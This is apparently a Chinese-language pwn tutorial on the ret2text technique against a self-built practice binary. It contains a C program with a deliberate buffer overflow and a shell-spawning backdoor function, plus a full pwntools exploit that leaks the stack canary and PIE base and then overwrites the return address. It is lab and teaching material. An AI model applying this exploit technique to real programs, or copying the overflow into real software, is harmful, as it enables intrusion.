ret2text,覆盖返回地址中某个代码的地址,也就是某个后门函数。
linux默认数据进入缓冲区,所以设置
setbuf(stdin, NULL);
setbuf(stdout, NULL);
char buf[0x100];
原始脚本:
#include <stdio.h>
#include <unistd.h>
#include<string.h>
#include <stdlib.h>
void backdoor() {
puts("this is backdoor.");
system("/bin/sh");
}
int main() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
char buf[0x100];
do {
puts("please input:");
read(0, buf, 0x200);
puts(buf);
} while (strcmp(buf, "exit") != 0);
return 0;
}
编译的patch
import os
version="2.31"
libc_name="libc-"+version+".so"
ld_name="ld-"+version+".so"
os.system("gcc test.c -o test -g")
os.system("cp /glibc/{}/amd64/lib/{} .".format(version,libc_name))
os.system("cp /glibc/{}/amd64/lib/{} .".format(version,ld_name))
os.system("chmod 777 "+libc_name)
os.system("chmod 777 "+ld_name)
for file_name in list(os.walk("."))[0][2]:
if "." not in file_name:
os.system("patchelf --replace-needed libc.so.6 ./{} ./{}".format(libc_name,file_name))
os.system("patchelf --set-interpreter ./{} ./{}".format(ld_name,file_name))
[*] '/home/ubuntu/pwn/user_pwn/fmt/2-2/test'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No
Debuginfo: Yes
依旧u main 50起手,vmmap找到起始段
0x56039e58f281 <main+117> call puts@plt
pwndbg> p/x 0x56039e58f281-0x56039e58e000
$1 = 0x1281
查看栈上的参数,0xd8处有程序段的地址
p.sendafter("please input:\n", "a"*0xd8)
elf.address = u64(p.recvuntil(('\x55', '\x56'))[-6:].ljust(8,'\x00')) - 0x130d
info("elf base: " + hex(elf.address))
然后查看反汇编,发现canay在0x108的位置,所以直接输入0x109,因为canary有\x00截断,把\x00覆盖成0x61
p.sendafter("please input:\n", "a"*0x109)
p.recvuntil("a" * 0x109)
canary = u64(p.recv(7).ljust(8, '\x00')) << 8
info("canary: " + hex(canary))
写入后门函数即可
payload = 'exit'.ljust(0x108, '\x00')
payload += p64(canary)
payload += 'b' * 8
payload += p64(elf.sym['backdoor'])
p.sendafter("please input:\n", payload)
完整的exp
from pwn import *
elf = ELF("./test")
context(os=elf.os, arch=elf.arch)
context.log_level = 'debug'
p = process([elf.path])
p.sendafter("please input:\n", "a"*0xd8)
elf.address = u64(p.recvuntil(('\x55', '\x56'))[-6:].ljust(8,'\x00')) - 0x130d
info("elf base: " + hex(elf.address))
p.sendafter("please input:\n", "a"*0x109)
p.recvuntil("a" * 0x109)
canary = u64(p.recv(7).ljust(8, '\x00')) << 8
info("canary: " + hex(canary))
gdb.attach(p, "b *$rebase(0x1281)\nc")
pause()
payload = 'exit'.ljust(0x108, '\x00')
payload += p64(canary)
payload += 'b' * 8
payload += p64(elf.sym['backdoor'])
p.sendafter("please input:\n", payload)
p.interactive()
评论(0)
暂无评论